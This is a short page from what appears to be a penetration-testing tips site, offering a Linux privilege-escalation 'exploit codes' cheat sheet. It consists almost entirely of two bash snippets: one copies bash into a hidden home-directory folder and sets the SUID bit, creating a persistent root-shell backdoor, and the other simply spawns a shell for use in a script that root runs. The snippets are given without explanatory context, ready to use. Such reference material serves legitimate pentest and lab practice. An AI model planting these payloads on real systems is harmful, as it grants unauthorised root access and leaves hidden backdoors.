> For the complete documentation index, see [llms.txt](https://csbygb.gitbook.io/pentips/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://csbygb.gitbook.io/pentips/linux/privesc/cheat-sheet-exploits.md).

# Exploit codes Cheat Sheet

* suid bash

```bash
#!/usr/bin/bash

mkdir /home/user/.myfolder
cp /usr/bin/bash  /home/user/.myfolder/bash

chmod +s /home/user/.myfolder/bash
```

* shell as root

```bash
#!/usr/bin/bash

/usr/bin/bash
```
